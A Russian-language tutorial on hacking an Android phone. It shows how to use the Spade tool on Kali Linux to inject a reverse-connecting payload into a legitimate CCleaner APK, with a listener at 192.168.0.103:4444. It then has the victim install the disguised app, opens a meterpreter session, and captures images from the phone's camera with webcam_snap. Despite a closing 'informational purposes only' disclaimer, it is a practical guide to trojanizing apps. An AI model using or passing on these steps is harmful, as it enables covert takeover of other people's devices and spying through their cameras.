Взлом Android-устройства
@webwareПривет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.
Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта www.apk4fun.com, попробуем, для начала, на ней.
Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
git clone https://github.com/suraj-root/spade.git
После успешного выполнения команды, вводим следующее:
> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)
После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.
> lhost > 192.168.0.103
> lport > 4444
Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.
Видим привилегии, которые нам доступны:
Готовый файл сохраняется в директории /root/spade
На запрос этой настройки отвечаем утвердительно:
Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:
Попробуем осмотреться в системе:
Все работает, теперь можно испытать работу, к примеру, камеры:
webcam_snap
И эта команда срабатывает успешно:
Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
На этом все, спасибо за внимание.